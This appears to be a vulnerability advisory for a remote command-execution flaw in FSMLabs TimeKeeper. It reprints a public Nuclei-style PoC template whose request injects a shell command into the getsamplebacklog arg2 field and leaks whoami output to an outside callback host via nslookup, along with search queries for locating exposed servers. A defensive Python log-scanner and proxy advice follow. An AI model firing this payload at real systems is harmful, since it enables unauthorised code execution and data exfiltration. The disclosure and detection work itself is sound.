CVE-2023-31465: TimeKeeper by FSMLabs - Remote Code Execution

Date: 2025-08-01 | Affected software: TimeKeeper | PoC: Public

Vulnerability Description

An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.

PoC Code [Public]

id: CVE-2023-31465

info:
  name: TimeKeeper by FSMLabs - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
  reference:
    - https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-31465
    - https://fsmlabs.com/fsmlabs-cybersecurity/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31465
    epss-score: 0.89914
    epss-percentile: 0.99553
    cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fsmlabs
    product: timekeeper
    shodan-query: http.favicon.hash:2134367771
    fofa-query: icon_hash=2134367771
  tags: cve,cve2023,timekeeper,rce,oast,fsmlabs

http:
  - raw:
      - |
        GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"seriesID":'
# digest: 4a0a00473045022100a0b6c9438f53e0eb74cb605b5d616fd6c59daff197a946b5a730fc89213c2ede022000cef5caaac712ae0f3d3f3ae36a464c673f346e33f96e71d7002b4769748f8a:922c64590222798bb761d5b6d8e72950
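
A detection-side companion to the request shape above, as an added example that is not part of the original template or any FSMLabs code: it scans web access logs for getsamplebacklog requests whose arg2 JSON carries a non-numeric earliest or latest value. The combined log format, the premise that legitimate values are plain epoch timestamps, and the names check_line and scan are assumptions of this example; the sample lines are constructed.

```python
import json
import re
from urllib.parse import quote, urlsplit, parse_qs

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TIMESTAMP = re.compile(r"\d+(\.\d+)?")  # assumption: legitimate values are epoch numbers

def check_line(line):
    """Return findings for one access-log line; an empty list means nothing suspicious."""
    m = REQ_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/getsamplebacklog"):
        return []
    raw = parse_qs(url.query).get("arg2", [""])[0]  # parse_qs also percent-decodes
    try:
        obj = json.loads(raw)
    except ValueError:
        return ["arg2 is not valid JSON"]
    if not isinstance(obj, dict):
        return ["arg2 is not a JSON object"]
    findings = []
    for field in ("earliest", "latest"):
        value = obj.get(field)
        if value is not None and not TIMESTAMP.fullmatch(str(value)):
            findings.append(f"{field} is not a plain timestamp: {value!r}")
    return findings

def scan(lines):
    """Return (line_number, findings) for every flagged line."""
    hits = [(n, check_line(entry)) for n, entry in enumerate(lines, 1)]
    return [(n, f) for n, f in hits if f]

def _log(path):
    # Constructed log line in combined-log style, not captured traffic.
    return f'192.0.2.10 - - [21/Feb/2023:10:45:16 +0000] "GET {path} HTTP/1.1" 200 512'

def _backlog(earliest):
    arg2 = json.dumps({"type": "client", "earliest": earliest,
                       "latest": 1676976916.328, "seriesID": 3})
    return _log("/getsamplebacklog?arg1=x&arg2=" + quote(arg2, safe=""))

SAMPLE_LOG = [
    _backlog("1676976316.328"),                              # well-formed request
    _backlog("1676976316.328||CONSTRUCTED-NON-NUMERIC||x"),  # metacharacters in field
    _log("/index.html"),                                     # unrelated request
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(findings)}")
```

The same numeric-only check on earliest and latest can be enforced at a reverse proxy in front of the TimeKeeper web interface until the product is upgraded past the affected 8.0.17 through 8.0.28 range.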
